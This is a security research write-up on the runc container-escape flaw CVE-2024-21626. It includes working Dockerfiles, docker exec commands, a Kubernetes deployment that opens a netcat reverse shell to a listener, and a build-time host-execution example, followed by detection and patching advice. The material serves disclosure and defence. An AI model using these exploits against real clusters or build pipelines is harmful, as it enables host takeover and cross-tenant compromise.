runc working directory breakout (CVE-2024-21626)
by Mohit Gupta
Overview
Snyk recently identified a flaw in runc <= 1.1.11, CVE-2024-21626. This issue effectively allowed an attacker to gain filesystem access to the underlying host's OS, which could be used to gain privileged access to the host.
This has an impact on orchestration based environments which use runc, such as Kubernetes. An attacker able to deploy pods into a Kubernetes environment could leverage this to perform a breakout attack onto the underlying Kubernetes nodes. This is more impactful for multi-tenant clusters, where its common for pods from different tenants to share underlying nodes. In these cases, a breakout from a pod could allow an attacker to access pods from another tenant.
This could also impact build pipelines executing in runners hosted in containerised environments, and allow an attacker to gain a foothold within a pipeline. This may enable an attacker to gain highly privileged credentials that provide access to production workloads or other sensitive environments.
Analysis
runc is a runtime commonly used to create and run containers on Linux systems, and is compliant with the Open Container Initiative (OCI) specification. This means it creates the container and can be configured with the various container related isolation options, such as namespaces, cgroups, capabilities, etc.
A container is simply a process running on the hosts kernel, leveraging various kernel features to isolate the containers process from other containers and the host itself. One of these methods is using a separate filesystem that the container has as its root filesystem. This is achieved through chroot.
This specific issue was due to a file descriptor being leaked which could be used by a newly-created container to have a working directory within the hosts filesystem namespace, as discussed in runc's security advisory. This would be outside of the container's chrooted filesystem.
This file descriptor leak was through /proc/self/fd/ which contains the file descriptors of the current process. runc creates a handle to the host's /sys/fs/cgroup, which would be accessible to runc within /proc/self/fd/. The exact file descriptor for this can vary, however WithSecure has had success with descriptors 7, 8 and 9 for this CVE.
When runc creates the container, an attacker could specify the current working directory should be the file descriptor, for example /proc/self/fd/7/. This would have runc set the current working directory to the hosts /sys/fs/cgroup, should that be open as file descriptor 7. PID 1 within the container would then have a working directory not within the container's filesystem namespace, but the host's. An attacker could use this to break out of the container and gain access to the underlying host, for example by adding an SSH key, or adding a malicious command to its crontab, etc. If the process running in the container is executing as UID 0 and there isn't a user namespace, an attacker could perform these actions as the host's root user, which would lead to privileged access to the host.
An example of this can be seen below using following Dockerfile:
FROM ubuntu
# Sets the current working directory for this image
WORKDIR /proc/self/fd/7/
Upon building as test and running the above Dockerfile, we get the following:
# Should the order of file descriptors be incorrect, we get the following error
$ docker run --rm -ti test
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory: unknown.
[..SNIP..]
# When file descriptors are loaded in the correct order
$ docker run --rm -ti test
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@3018e221cb3a:.#
During testing we received the first error multiple times, and after about 4 attempts the command was successful. One thing to note indicating success is the error retrieving current directory: getcwd error message on the last command. This signifies the getcwd call has failed, which makes sense considering the current working directory is outside of the containers filesystem namespace.
Creating a file on the hosts filesystem called test-host-file, and enumerating the containers filesystem does indeed show that the container has access to the hosts filesystem:
# Directory listing for the containers root filesystem
root@3018e221cb3a:.# ls /
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
# Directory listing for the hosts root filesystem, obtained by moving to parent directories of our current working directory
root@3018e221cb3a:.# ls ../../../../
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin dev home lib64 mnt proc run srv test-host-file usr var
boot etc lib lost+found opt root sbin sys tmp
An alternative method to exploit this would be to create a new process within an existing container. This translates to an underlying call to runc with the same requirements of setting the current working directory. An example is shown below:
# Create a container without any manipulations
$ docker run --rm -d skybound/net-utils sleep infinity
bc745f35f09e2d0322b31ad5a478d107c494a8c42fdf242f3c9f73822c3531e0
# Exec into an already running container, setting the cwd to /proc/self/fd/7
$ docker exec -ti -w /proc/self/fd/7 bc745f3 bash
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
[..SNIP..]
# Attempt other fds
$ docker exec -ti -w /proc/self/fd/8 bc745f3 bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@bc745f35f09e:.#
We had varying levels of success with different file descriptors with this method. Sometimes 7 would work, others over a 100 attempts with 7 would fail and we would switch to another file descriptor. In this case, 8 worked and we were in the same position as earlier, once again as demonstrated by the error retrieving current directory: getcwd error.
Switching to a Kubernetes context, the primary process can't be the shell command directly as there is no interactive tty to it. This can be worked around using reverse shells. The updated Dockerfile can be seen below:
FROM ubuntu
RUN apt update; apt install -y netcat-traditional; rm -rf /var/lib/apt/lists/*
WORKDIR /proc/self/fd/7/
The main addition is the RUN command which installs netcat, a common networking tool for establishing network connections. This container image was pushed to docker hub as withsecurelabs/cve-2024-21626.
A YAML file describing a deployment was created, which would deploy the above image into a cluster. This is shown below.
apiVersion: apps/v1
kind: Deployment
metadata:
name: testing
spec:
selector:
matchLabels:
name: testing
template:
metadata:
labels:
name: testing
spec:
containers:
- name: testing
image: withsecurelabs/cve-2024-21626
imagePullPolicy: Always
# HOST / PORT substituted with listening port
args: ["/usr/bin/nc", "-e", "/bin/bash", "HOST", "PORT"]
It should be noted, the working directory could also be set with the workingDir parameter within the pod specification if not through the image. After deploying this, we get the following when listing pods:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
testing-dc8fd5ccc-z2zd7 0/1 RunContainerError 0 (6s ago) 8s
This is to be expected, and describing the pod shows a similar error compared to docker run.
$ kubectl describe pod
[..SNIP..]
Warning Failed 3s (x4 over 43s) kubelet Error: failed to start container "testing": Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
Whilst Kubernetes will attempt to retry deploying the pods, we can force it to retry more actively to speed up the attempts with kubectl rollout restart deployment testing
After multiple attempts, WithSecure had success with the file descriptor set to 9. This was using the withsecurelabs/cve-2024-21626:9 image.
$ nc -nlvp 8080
Listening on 0.0.0.0 8080
Connection received on 34.241.73.196 48858
# list the contents of the cgroup directory
ls
blkio
cpu
cpu,cpuacct
cpuacct
cpuset
devices
freezer
hugetlb
memory
net_cls
net_cls,net_prio
net_prio
perf_event
pids
systemd
So far, we've demonstrated exploiting this vulnerability by running containers through docker run and Kubernetes pods. However, containers are also created with docker build. By adding malicious code directly to the Dockerfile after a WORKDIR command, an attacker could execute malicious code on the host filesystem where docker images are being built.
This can be seen with the below Dockerfile
FROM ubuntu
WORKDIR /proc/self/fd/7
RUN cd ../../../../ && \
ls && \
echo "malicious code here"
When this Dockerfile is built, an intermediary image will be created where the working directory is set to /prov/self/fd/7, and that image is then used to create a container to run the commands within RUN.
This can be seen below:
$ docker build -t test --progress=plain --no-cache .
#0 building with "default" instance using docker driver
[..SNIP..]
#5 [2/3] WORKDIR /proc/self/fd/7
#5 CACHED
#6 [3/3] RUN cd ../../../../ && ls && echo "malicious code here"
#6 0.207 sh: 0: getcwd() failed: No such file or directory
#6 0.207 /bin/sh: 1: cd: getcwd() failed: No such file or directory
#6 0.208 bin
#6 0.208 boot
#6 0.208 dev
#6 0.208 etc
#6 0.208 home
#6 0.208 lib
#6 0.208 lib64
#6 0.208 lost+found
#6 0.208 mnt
#6 0.208 opt
#6 0.208 proc
#6 0.208 root
#6 0.208 run
#6 0.208 sbin
#6 0.208 srv
#6 0.208 sys
#6 0.208 test-host-file
#6 0.208 tmp
#6 0.208 usr
#6 0.208 var
#6 0.208 malicious code here
#6 DONE 0.2s
[..SNIP..]
As can be seen our commands have successfully executed as part of the build, and the test-host-file is also present showing this is the file system of the host. This approach could be used to compromise CI/CD systems, by submitting maliciously altered Dockerfiles which will then be built by the relevant CI/CD pipeline's runners.
Detection
This attack leverages the working directory when creating containers, or spawning new processes within a container. As such detection attempts would be on where /proc/self/fd/[0-9]+ would be set as the working directory.
In Kubernetes, this could be set within the workingDir field as part of the pod specification, however this by itself is not a reliable mechanism as it could also be set within the images configuration. Review of both images and pod specifications to check the working directory would flag this issue.
Additionally, WithSecure has had success with creating a symlink to /proc/self/fd in the containers filesystem, this symlink was then set as the working directory. These methods can be harder to detect statically as an attacker could add significant levels of obfuscation to this method.
This attack could be detected at runtime. Synk have released an eBPF-based runtime detector that analyses the actual path used for the working directory based of the underlying system calls and ensures that is not set to the file descriptor.
They have also released a static analysis tool that can analyse a Dockerfile or a docker image. It should be noted this could be less effective compared to runtime detection, as there may be false positives or negatives. This is because it's working on a static set of signatures and rules which may not comprehensively match all cases.
Mitigations
Runc and, by extension software depending on runc, should be patched to runc version 1.1.12 or later. Vendors may also have their own advisories or security bulletins on recommended actions, and these should be followed where available.